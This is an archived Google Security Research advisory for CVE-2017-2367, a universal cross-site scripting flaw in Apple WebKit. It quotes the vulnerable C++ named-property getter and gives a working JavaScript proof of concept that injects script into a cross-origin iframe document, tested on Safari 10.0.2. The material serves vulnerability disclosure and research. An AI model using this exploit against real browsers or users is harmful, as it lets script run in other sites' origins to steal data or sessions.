Apple Webkit Named Property UXSS

2017-04-09T00:00:00
ID PACKETSTORM:141956
Type packetstorm
Reporter Google Security Research
Modified 2017-04-09T00:00:00

Description

                                        
                                            ` Apple Webkit: UXSS by accessing a named property from an unloaded window   
  
CVE-2017-2367  
  
  
The frame is not detached from an unloaded window. We can access to the new document's named properties via the following function.  
  
static bool jsDOMWindowPropertiesGetOwnPropertySlotNamedItemGetter(JSDOMWindowProperties* thisObject, Frame& frame, ExecState* exec, PropertyName propertyName, PropertySlot& slot)  
{  
...  
Document* document = frame.document(); <<-------- the new document.  
if (is<HTMLDocument>(*document)) {  
auto& htmlDocument = downcast<HTMLDocument>(*document);  
auto* atomicPropertyName = propertyName.publicName();  
if (atomicPropertyName && htmlDocument.hasWindowNamedItem(*atomicPropertyName)) {  
JSValue namedItem;  
if (UNLIKELY(htmlDocument.windowNamedItemContainsMultipleElements(*atomicPropertyName))) {  
Ref<HTMLCollection> collection = document->windowNamedItems(atomicPropertyName);  
ASSERT(collection->length() > 1);  
namedItem = toJS(exec, thisObject->globalObject(), collection);  
} else  
namedItem = toJS(exec, thisObject->globalObject(), htmlDocument.windowNamedItem(*atomicPropertyName));  
slot.setValue(thisObject, ReadOnly | DontDelete | DontEnum, namedItem);  
return true;  
}  
}  
  
return false;  
}  
  
PoC:  
  
"use strict";  
  
let f = document.body.appendChild(document.createElement("iframe"));  
let get_element = f.contentWindow.Function("return logo;");  
  
f.onload = () => {  
f.onload = null;  
  
let node = get_element();  
  
var sc = document.createElement("script");  
sc.innerText = "alert(location)";  
node.appendChild(sc);  
};  
  
f.src = "<a href="https://abc.xyz/";" title="" class="" rel="nofollow">https://abc.xyz/";</a>  
  
Tested on Safari 10.0.2(12602.3.12.0.1).  
  
  
This bug is subject to a 90 day disclosure deadline. If 90 days elapse  
without a broadly available patch, then the bug report will automatically  
become visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`